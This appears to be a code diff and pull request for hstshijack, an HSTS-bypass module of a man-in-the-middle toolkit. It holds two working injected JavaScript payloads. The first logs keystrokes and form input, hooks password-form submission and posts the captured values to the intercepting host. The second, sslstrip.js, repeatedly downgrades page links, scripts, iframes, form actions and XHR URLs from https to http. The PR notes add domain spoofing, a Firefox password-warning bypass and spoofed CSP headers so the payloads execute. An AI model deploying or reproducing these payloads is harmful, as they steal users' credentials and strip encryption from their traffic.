+		for (var obf_var_i_37423 = 0; obf_var_i_37423 < obf_var_inputs_37423.length; obf_var_i_37423++) {
+			if (obf_var_inputs_37423[obf_var_i_37423].value != "") {
+				obf_var_params_37423 += encodeURIComponent(obf_var_inputs_37423[obf_var_i_37423].name) + "=" + encodeURIComponent(obf_var_inputs_37423[obf_var_i_37423].value) + ( obf_var_i_37423 < (obf_var_inputs_37423.length-1) ? "&" : "" );
 			}
 		}
-		for (var obf_var_i = 0; obf_var_i < obf_var_textareas.length; obf_var_i++) {
-			if (obf_var_textareas[obf_var_i].value != "") {
-				obf_var_params += encodeURIComponent(obf_var_textareas[obf_var_i].name) + "=" + encodeURIComponent(obf_var_textareas[obf_var_i].value) + ( obf_var_i < (obf_var_textareas.length-1) ? "&" : "" );
+		for (var obf_var_i_37423 = 0; obf_var_i_37423 < obf_var_textareas_37423.length; obf_var_i_37423++) {
+			if (obf_var_textareas_37423[obf_var_i_37423].value != "") {
+				obf_var_params_37423 += encodeURIComponent(obf_var_textareas_37423[obf_var_i_37423].name) + "=" + encodeURIComponent(obf_var_textareas_37423[obf_var_i_37423].value) + ( obf_var_i_37423 < (obf_var_textareas_37423.length-1) ? "&" : "" );
 			}
 		}
 
-		if (obf_var_params.length > 0) {
-			obf_var_req = new XMLHttpRequest();
-			obf_var_req.open("POST", "http://" + location.host + "/obf_path_whitelist?" + obf_var_params, true);
-			obf_var_req.send();
+		if (obf_var_params_37423.length > 0) {
+			obf_var_req_37423 = new XMLHttpRequest();
+			obf_var_req_37423.open("POST", "http://" + location.host + "/obf_path_whitelist?" + obf_var_params_37423, true);
+			obf_var_req_37423.send();
 		}
-	} catch(obf_ignore){}
+	} catch(obf_ignore_37423){}
 }
 
-self.addEventListener("keyup", function(obf_var_event) {
+self.addEventListener("keyup", function(obf_var_event_37423) {
 	try {
-		if (obf_var_event.target.tagName.match(/INPUT|TEXTAREA/)) {
-			obf_func_callback();
+		if (obf_var_event_37423.target.tagName.match(/INPUT|TEXTAREA/)) {
+			obf_func_callback_37423();
 		}
-	} catch(obf_ignore){}
+	} catch(obf_ignore_37423){}
 });
 
-function obf_func_attack() {
-	document.querySelectorAll("form").forEach(function(obf_var_form){
-		obf_var_form.addEventListener("submit", obf_func_callback);
-		if (obf_var_form.querySelector("input[type=password]")) {
-			obf_var_form.addEventListener("submit", obf_func_whitelist);
+function obf_func_attack_37423() {
+	document.querySelectorAll("form").forEach(function(obf_var_form_37423){
+		obf_var_form_37423.addEventListener("submit", obf_func_callback_37423);
+		if (obf_var_form_37423.querySelector("input[type=password]")) {
+			obf_var_form_37423.addEventListener("submit", obf_func_whitelist_37423);
 		}
 	});
 
-	document.querySelectorAll("input").forEach(function(obf_var_input){
-		obf_var_input.autocomplete = "off";
+	document.querySelectorAll("input").forEach(function(obf_var_input_37423){
+		obf_var_input_37423.autocomplete = "off";
 	});
 }
 
 try {
-	obf_func_attack();
-} catch(obf_ignore){
+	obf_func_attack_37423();
+} catch(obf_ignore_37423){
 	try {
-		document.addEventListener("DOMContentLoaded", obf_func_attack);
-	} catch(obf_ignore){
-		self.addEventListener("load", obf_func_attack);
+		document.addEventListener("DOMContentLoaded", obf_func_attack_37423);
+	} catch(obf_ignore_37423){
+		self.addEventListener("load", obf_func_attack_37423);
 	}
 }

--- a/hstshijack/payloads/sslstrip.js
+++ b/hstshijack/payloads/sslstrip.js
@@ -1,26 +1,26 @@
 (function() {
-	var obf_open = XMLHttpRequest.prototype.open;
-	XMLHttpRequest.prototype.open = function(obf_var_method, obf_var_url, obf_var_async, obf_var_username, obf_var_password) {
-		obf_var_url = obf_var_url.replace(/(http)s/ig, "$1");
-		return obf_open.apply(this, arguments);
+	var obf_open_399385 = XMLHttpRequest.prototype.open;
+	XMLHttpRequest.prototype.open = function(obf_var_method_399385, obf_var_url_399385, obf_var_async_399385, obf_var_username_399385, obf_var_password_399385) {
+		obf_var_url_399385 = obf_var_url_399385.replace(/(http)s/ig, "$1");
+		return obf_open_399385.apply(this, arguments);
 	}
 })();
 
-function obf_func_attack() {
-	document.querySelectorAll("a,iframe,script,form").forEach(function(obf_var_node){
-		switch (obf_var_node.tagName) {
-			case "A": obf_var_node.href && obf_var_node.href.match(/https/i) ? obf_var_node.href = obf_var_node.href.replace(/(http)s/ig, "$1") : ""; break;
-			case "IFRAME": obf_var_node.src && obf_var_node.src.match(/https/i) ? obf_var_node.src = obf_var_node.src.replace(/(http)s/ig, "$1") : ""; break;
-			case "SCRIPT": obf_var_node.src && obf_var_node.src.match(/https/i) ? obf_var_node.src = obf_var_node.src.replace(/(http)s/ig, "$1") : ""; break;
-			case "FORM": obf_var_node.action && obf_var_node.action.match(/https/i) ? obf_var_node.action = obf_var_node.action.replace(/(http)s/ig, "$1") : ""; break;
+function obf_func_attack_399385() {
+	document.querySelectorAll("a,iframe,script,form").forEach(function(obf_var_node_399385){
+		switch (obf_var_node_399385.tagName) {
+			case "A": obf_var_node_399385.href && obf_var_node_399385.href.match(/https/i) ? obf_var_node_399385.href = obf_var_node_399385.href.replace(/(http)s/ig, "$1") : ""; break;
+			case "IFRAME": obf_var_node_399385.src && obf_var_node_399385.src.match(/https/i) ? obf_var_node_399385.src = obf_var_node_399385.src.replace(/(http)s/ig, "$1") : ""; break;
+			case "SCRIPT": obf_var_node_399385.src && obf_var_node_399385.src.match(/https/i) ? obf_var_node_399385.src = obf_var_node_399385.src.replace(/(http)s/ig, "$1") : ""; break;
+			case "FORM": obf_var_node_399385.action && obf_var_node_399385.action.match(/https/i) ? obf_var_node_399385.action = obf_var_node_399385.action.replace(/(http)s/ig, "$1") : ""; break;
 		}
 	});
 }
 
-setInterval(obf_func_attack, 666);
+setInterval(obf_func_attack_399385, 666);
 
 try {
-	document.addEventListener("DOMContentLoaded", obf_func_attack);
-} catch(obf_ignore) {
-	self.addEventListener("load", obf_func_attack);
+	document.addEventListener("DOMContentLoaded", obf_func_attack_399385);
+} catch(obf_ignore_399385) {
+	self.addEventListener("load", obf_func_attack_399385);
 }


### PR DESCRIPTION
New features/enhancements:
  - top level domain spoofing is now supported (e.g. www\.* <-> wvvw.*)
  - new payload that bypasses unsafe password field warnings on firefox
  - only the first 1000 chars of bodies are scanned for ability to inject
  - 3 new spoofed CSP headers ensuring that payloads are allowed to be executed on all pages
  - refactored domain <-> regexp conversions to be more readable (and capable of TLD spoofing)
  - headers are now also stripped from port 443

Fixes:
  - payloads are always base64 encoded in HTML documents to avoid `$` getting interpreted as a regexp substitution during injection
  - prevented duplicate variables (when unobfuscated) by adding unique suffixes to variable names
  - stop domain spoofing after 1 successful replacement
  -  only override XMLHttpRequest.open function once